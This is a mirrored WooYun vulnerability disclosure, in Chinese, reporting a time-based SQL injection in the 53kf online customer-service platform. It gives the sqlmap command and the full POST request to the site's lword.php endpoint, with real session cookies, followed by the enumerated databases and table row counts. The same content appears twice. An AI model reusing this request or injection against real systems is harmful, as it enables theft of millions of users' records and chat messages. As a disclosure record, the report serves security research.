1. 首页
  2. 乌云镜像
  3. 53快服平台某漏洞涉及760w用户信息+百万聊天工人信息+消息
作者:安三

53快服平台某漏洞涉及760w用户信息+百万聊天工人信息+消息

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-25: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

RT

详细说明:

 

code 区域
post注入语法:sqlmap.py -r 6.txt -D talk --count --tables 延迟注入慢的不行跑了25小时左右

======================数据包=========================

POST /lword.php HTTP/1.1

Host: www5.53kf.com

Proxy-Connection: keep-alive

Content-Length: 364

Origin: http://www5.53kf.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0

CONTENT-TYPE: application/x-www-form-urlencoded

Accept: */*

Referer: http://www5.53kf.com/webCompany.php?arg=9004997&style=1

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: unique_ip_revisit70755185=1461192341; guest_id=10118457428009; land_page_72060147=http%3A%2F%2Fmall.lqxshop.com%2F; unique_ip_revisit72060147=1461358101; land_page_72032248=http%3A%2F%2Fwww.jyh.com%2F; unique_ip_72032248=115.214.46.134; unique_ip_revisit72032248=1461428941; _yd_=GA1.2.343522085.1461434523; Hm_lvt_3a5b4ba61a6b3219159606ddf5c41001=1461434523; Hm_lpvt_3a5b4ba61a6b3219159606ddf5c41001=1461434788; land_page_70865058=http%3A%2F%2Fwww.602.com%2Fkefu%2Fonlinekf%2F; hz6d_open_talk_70865058=1; guest_id=10118457428009; YGXSID=pt2qvomm1p99l0lgg7ui5ss6a2; customer_service_language=cn



action=import&company_id=70865058&tempid=53981272905&guest_id=10118457428009&referer=http://www.602.com/kefu/onlinekf/&referer1=&ly_mode=3&ly_object=&hasrobot=1&talk_his_table=talk_his_d51&message_table=message_d51&ly_name=111&ly_email=313131%40qq.com&ly_phone=13655555555&ly_qq=1&ly_company=111111&ly_check_num=ey46&ly_first=true&iscard=0&m_lyszc=on&ly_content=11



数据库信息

code 区域
available databases [4]:

[*] information_schema

[*] ip

[*] talk

[*] test



当前库表信息

code 区域
Database: talk

+--------------------------------+---------+

| Table                          | Entries |

+--------------------------------+---------+

| cus_user                       | 7587356 |

| chat_worker                    | 5445630 |

| message_d17                    | 3731202 |

| statistic_mobile               | 2441059 |

| message                        | 2298431 |

| message_d9                     | 2148873 |

| message_d4                     | 1988625 |

| message_d2                     | 1808583 |

| message_d44                    | 1777645 |

| stat_place                     | 1744358 |

| imessage                       | 1743501 |

| operate_log                    | 1593692 |

| message_d1                     | 1487943 |

| message_d6                     | 1474119 |

| message_d3                     | 1385246 |

| message_d5                     | 1314770 |

| message_d18                    | 1126727 |

| quality_tj                     | 1044778 |

| message_d7                     | 940082  |

| message_d42                    | 910868  |

| message_d8                     | 904577  |

| message_d51                    | 826831  |

| message_d15                    | 765361  |

| message_d29                    | 678242  |

| message_d41                    | 668929  |

| message_d37                    | 657905  |

| talk_his_d17                   | 639533  |

| talk_his_d4                    | 629101  |

| talk_his                       | 586510  |

| cyy                            | 581547  |

| talk_his_d18                   | 567066  |

| message_d21                    | 555186  |

| company_config                 | 545814  |

| message_d23                    | 528215  |

| message_d40                    | 527550  |

| talk_his_d1                    | 489171  |

| message_d25                    | 483640  |

| message_d34                    | 468168  |

| message_d26                    | 457966  |

| msg_reply                      | 439597  |

| talk_his_d2                    | 428249  |

| message_d19                    | 428055  |

| message_d22                    | 418819  |

| message_d43                    | 393074  |

| message_d35                    | 390498  |

| message_d10                    | 387334  |

| link                           | 369830  |

| message_d12                    | 369510  |

| sync_cus_user                  | 324439  |

| message_d47                    | 315373  |

| message_d49                    | 312978  |

| message_d11                    | 312933  |

| message_d45                    | 280488  |

| talk_his_d3                    | 267285  |

| message_d39                    | 252048  |

| message_d30                    | 247659  |

| message_d27                    | 245866  |

| worker_config                  | 241491  |

| message_d20                    | 219202  |

| stat_to                        | 209362  |

| message_d13                    | 206778  |

| talk_his_d40                   | 195220  |

| talk_his_d19                   | 188558  |

| message_d36                    | 181096  |

| message_d38                    | 173975  |

| message_d14                    | 170788  |

| talk_his_d21                   | 167693  |

| talk_his_d37                   | 161604  |

| chat_nation                    | 159047  |

| file                           | 154214  |

| talk_his_d10                   | 153588  |

| message_d24                    | 150784  |

| talk_his_d23                   | 145574  |

| talk_his_d29                   | 134416  |

| talk_his_d22                   | 126111  |

| talk_his_d15                   | 120870  |

| message_d16                    | 101893  |

| talk_his_d25                   | 98135   |

| talk_his_d11                   | 94796   |

| message_d33                    | 90019   |

| talk_his_d27                   | 89377   |

| talk_his_d39                   | 89312   |

| block_user                     | 86269   |

| talk_his_d20                   | 83174   |

| message_d28                    | 80430   |

| talk_his_d26                   | 77679   |

| message_d52                    | 77008   |

| zsk_noanswer                   | 75277   |

| talk_his_d36                   | 68745   |

| message_d53                    | 67881   |

| cus_bill                       | 65664   |

| talk_his_d35                   | 64107   |

| talk_his_d13                   | 62955   |

| cyy_group                      | 61874   |

| message_d46                    | 60569   |

| talk_his_d34                   | 52756   |

| talk_his_d12                   | 52166   |

| talk_his_d28                   | 38660   |

| talk_his_d14                   | 37929   |

| cus_web_msg                    | 37392   |

| message_d50                    | 36374   |

| talk_his_d30                   | 36115   |

| message_d32                    | 34785   |

| worker                         | 34396   |

| talk_his_d24                   | 32012   |

| talk_his_d38                   | 29346   |

| talk_his_d16                   | 25001   |

| message_d31                    | 21752   |

| company_style                  | 20888   |

| company                        | 17999   |

| talk_his_d33                   | 17473   |

| autoreply                      | 13039   |

| talk_his_d53                   | 12826   |

| identity_role_id               | 12765   |

| inner_identity                 | 12625   |

| module_new                     | 11552   |

| talk_his_d46                   | 11188   |

| kfassign_group_worker          | 10913   |

| sms_lword                      | 10441   |

| talk_his_d52                   | 10123   |

| `identity`                     | 9942    |

| message_d48                    | 9181    |

| talk_his_d32                   | 9129    |

| worker_group                   | 7837    |

| kfassign_group                 | 7782    |

| talk_quality                   | 7514    |

| zsk_key                        | 6517    |

| temp_download_cus_user         | 5921    |

| temp_download_statistic_nation | 4511    |

| temp_download_statistic_place  | 4146    |

| talk_his_d31                   | 3564    |

| talk_his_d50                   | 3505    |

| talk_his_d41                   | 3491    |

| zsk_question                   | 3319    |

| talk_his_d48                   | 3249    |

| company_ad                     | 3140    |

| area_kf                        | 2819    |

| wechat_guest                   | 2388    |

| talk_theme                     | 1554    |

| weixin_config                  | 1417    |

| cus_theme                      | 1187    |

| zsk_category                   | 756     |

| temp_download_statistic        | 705     |

| sms_config                     | 669     |

| robot_mem                      | 621     |

| temp_download_message          | 526     |

| temp_download_chat_worker      | 420     |

| cus_link                       | 362     |

| robot_hot                      | 258     |

| face                           | 256     |

| robot                          | 236     |

| cus_mail                       | 193     |

| temp_download_stat_place       | 167     |

| cus_group                      | 157     |

| kf_group                       | 149     |

| email                          | 148     |

| logo                           | 144     |

| talk_weixin                    | 141     |

| temp_download_talk_his         | 111     |

| mailqueue                      | 101     |

| image                          | 76      |

| company_tinet                  | 67      |

| chat_tables                    | 54      |

| wmenu                          | 46      |

| kf_group_newthing              | 44      |

| temp_download_statistic_from   | 44      |

| account_switch                 | 38      |

| temp_download_statistic_net    | 26      |

| sys_notify                     | 24      |

| company_tinet_cno              | 23      |

| kf_group_upload                | 14      |

| daemonlog_recv                 | 11      |

| daemonlog_send                 | 11      |

| mail_template                  | 11      |

| wechat_robot_question          | 8       |

| etel_logo                      | 6       |

| temp_download_worker           | 6       |

| sph_counter                    | 2       |

| download_job                   | 1       |

| err_infos                      | 1       |

+--------------------------------+---------+



表字段 数据信息就不跑了吧

漏洞证明:

 

code 区域
post注入语法:sqlmap.py -r 6.txt -D talk --count --tables 延迟注入慢的不行跑了25小时左右

======================数据包=========================

POST /lword.php HTTP/1.1

Host: www5.53kf.com

Proxy-Connection: keep-alive

Content-Length: 364

Origin: http://www5.53kf.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0

CONTENT-TYPE: application/x-www-form-urlencoded

Accept: */*

Referer: http://www5.53kf.com/webCompany.php?arg=9004997&style=1

Accept-Encoding: gzip,deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: unique_ip_revisit70755185=1461192341; guest_id=10118457428009; land_page_72060147=http%3A%2F%2Fmall.lqxshop.com%2F; unique_ip_revisit72060147=1461358101; land_page_72032248=http%3A%2F%2Fwww.jyh.com%2F; unique_ip_72032248=115.214.46.134; unique_ip_revisit72032248=1461428941; _yd_=GA1.2.343522085.1461434523; Hm_lvt_3a5b4ba61a6b3219159606ddf5c41001=1461434523; Hm_lpvt_3a5b4ba61a6b3219159606ddf5c41001=1461434788; land_page_70865058=http%3A%2F%2Fwww.602.com%2Fkefu%2Fonlinekf%2F; hz6d_open_talk_70865058=1; guest_id=10118457428009; YGXSID=pt2qvomm1p99l0lgg7ui5ss6a2; customer_service_language=cn



action=import&company_id=70865058&tempid=53981272905&guest_id=10118457428009&referer=http://www.602.com/kefu/onlinekf/&referer1=&ly_mode=3&ly_object=&hasrobot=1&talk_his_table=talk_his_d51&message_table=message_d51&ly_name=111&ly_email=313131%40qq.com&ly_phone=13655555555&ly_qq=1&ly_company=111111&ly_check_num=ey46&ly_first=true&iscard=0&m_lyszc=on&ly_content=11



数据库信息

code 区域
available databases [4]:

[*] information_schema

[*] ip

[*] talk

[*] test



当前库表信息

code 区域
Database: talk

+--------------------------------+---------+

| Table                          | Entries |

+--------------------------------+---------+

| cus_user                       | 7587356 |

| chat_worker                    | 5445630 |

| message_d17                    | 3731202 |

| statistic_mobile               | 2441059 |

| message                        | 2298431 |

| message_d9                     | 2148873 |

| message_d4                     | 1988625 |

| message_d2                     | 1808583 |

| message_d44                    | 1777645 |

| stat_place                     | 1744358 |

| imessage                       | 1743501 |

| operate_log                    | 1593692 |

| message_d1                     | 1487943 |

| message_d6                     | 1474119 |

| message_d3                     | 1385246 |

| message_d5                     | 1314770 |

| message_d18                    | 1126727 |

| quality_tj                     | 1044778 |

| message_d7                     | 940082  |

| message_d42                    | 910868  |

| message_d8                     | 904577  |

| message_d51                    | 826831  |

| message_d15                    | 765361  |

| message_d29                    | 678242  |

| message_d41                    | 668929  |

| message_d37                    | 657905  |

| talk_his_d17                   | 639533  |

| talk_his_d4                    | 629101  |

| talk_his                       | 586510  |

| cyy                            | 581547  |

| talk_his_d18                   | 567066  |

| message_d21                    | 555186  |

| company_config                 | 545814  |

| message_d23                    | 528215  |

| message_d40                    | 527550  |

| talk_his_d1                    | 489171  |

| message_d25                    | 483640  |

| message_d34                    | 468168  |

| message_d26                    | 457966  |

| msg_reply                      | 439597  |

| talk_his_d2                    | 428249  |

| message_d19                    | 428055  |

| message_d22                    | 418819  |

| message_d43                    | 393074  |

| message_d35                    | 390498  |

| message_d10                    | 387334  |

| link                           | 369830  |

| message_d12                    | 369510  |

| sync_cus_user                  | 324439  |

| message_d47                    | 315373  |

| message_d49                    | 312978  |

| message_d11                    | 312933  |

| message_d45                    | 280488  |

| talk_his_d3                    | 267285  |

| message_d39                    | 252048  |

| message_d30                    | 247659  |

| message_d27                    | 245866  |

| worker_config                  | 241491  |

| message_d20                    | 219202  |

| stat_to                        | 209362  |

| message_d13                    | 206778  |

| talk_his_d40                   | 195220  |

| talk_his_d19                   | 188558  |

| message_d36                    | 181096  |

| message_d38                    | 173975  |

| message_d14                    | 170788  |

| talk_his_d21                   | 167693  |

| talk_his_d37                   | 161604  |

| chat_nation                    | 159047  |

| file                           | 154214  |

| talk_his_d10                   | 153588  |

| message_d24                    | 150784  |

| talk_his_d23                   | 145574  |

| talk_his_d29                   | 134416  |

| talk_his_d22                   | 126111  |

| talk_his_d15                   | 120870  |

| message_d16                    | 101893  |

| talk_his_d25                   | 98135   |

| talk_his_d11                   | 94796   |

| message_d33                    | 90019   |

| talk_his_d27                   | 89377   |

| talk_his_d39                   | 89312   |

| block_user                     | 86269   |

| talk_his_d20                   | 83174   |

| message_d28                    | 80430   |

| talk_his_d26                   | 77679   |

| message_d52                    | 77008   |

| zsk_noanswer                   | 75277   |

| talk_his_d36                   | 68745   |

| message_d53                    | 67881   |

| cus_bill                       | 65664   |

| talk_his_d35                   | 64107   |

| talk_his_d13                   | 62955   |

| cyy_group                      | 61874   |

| message_d46                    | 60569   |

| talk_his_d34                   | 52756   |

| talk_his_d12                   | 52166   |

| talk_his_d28                   | 38660   |

| talk_his_d14                   | 37929   |

| cus_web_msg                    | 37392   |

| message_d50                    | 36374   |

| talk_his_d30                   | 36115   |

| message_d32                    | 34785   |

| worker                         | 34396   |

| talk_his_d24                   | 32012   |

| talk_his_d38                   | 29346   |

| talk_his_d16                   | 25001   |

| message_d31                    | 21752   |

| company_style                  | 20888   |

| company                        | 17999   |

| talk_his_d33                   | 17473   |

| autoreply                      | 13039   |

| talk_his_d53                   | 12826   |

| identity_role_id               | 12765   |

| inner_identity                 | 12625   |

| module_new                     | 11552   |

| talk_his_d46                   | 11188   |

| kfassign_group_worker          | 10913   |

| sms_lword                      | 10441   |

| talk_his_d52                   | 10123   |

| `identity`                     | 9942    |

| message_d48                    | 9181    |

| talk_his_d32                   | 9129    |

| worker_group                   | 7837    |

| kfassign_group                 | 7782    |

| talk_quality                   | 7514    |

| zsk_key                        | 6517    |

| temp_download_cus_user         | 5921    |

| temp_download_statistic_nation | 4511    |

| temp_download_statistic_place  | 4146    |

| talk_his_d31                   | 3564    |

| talk_his_d50                   | 3505    |

| talk_his_d41                   | 3491    |

| zsk_question                   | 3319    |

| talk_his_d48                   | 3249    |

| company_ad                     | 3140    |

| area_kf                        | 2819    |

| wechat_guest                   | 2388    |

| talk_theme                     | 1554    |

| weixin_config                  | 1417    |

| cus_theme                      | 1187    |

| zsk_category                   | 756     |

| temp_download_statistic        | 705     |

| sms_config                     | 669     |

| robot_mem                      | 621     |

| temp_download_message          | 526     |

| temp_download_chat_worker      | 420     |

| cus_link                       | 362     |

| robot_hot                      | 258     |

| face                           | 256     |

| robot                          | 236     |

| cus_mail                       | 193     |

| temp_download_stat_place       | 167     |

| cus_group                      | 157     |

| kf_group                       | 149     |

| email                          | 148     |

| logo                           | 144     |

| talk_weixin                    | 141     |

| temp_download_talk_his         | 111     |

| mailqueue                      | 101     |

| image                          | 76      |

| company_tinet                  | 67      |

| chat_tables                    | 54      |

| wmenu                          | 46      |

| kf_group_newthing              | 44      |

| temp_download_statistic_from   | 44      |

| account_switch                 | 38      |

| temp_download_statistic_net    | 26      |

| sys_notify                     | 24      |

| company_tinet_cno              | 23      |

| kf_group_upload                | 14      |

| daemonlog_recv                 | 11      |

| daemonlog_send                 | 11      |

| mail_template                  | 11      |

| wechat_robot_question          | 8       |

| etel_logo                      | 6       |

| temp_download_worker           | 6       |

| sph_counter                    | 2       |

| download_job                   | 1       |

| err_infos                      | 1       |

+--------------------------------+---------+



表字段 数据信息就不跑了吧

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-25 09:27

厂商回复:

感谢您对问题的反馈,我们将对漏洞做紧急修复,谢谢!

最新状态:

暂无

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:53快服平台某漏洞涉及760w用户信息+百万聊天工人信息+消息 - https://www.15qq.cn/wooyun/995.html

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知

大家都在搜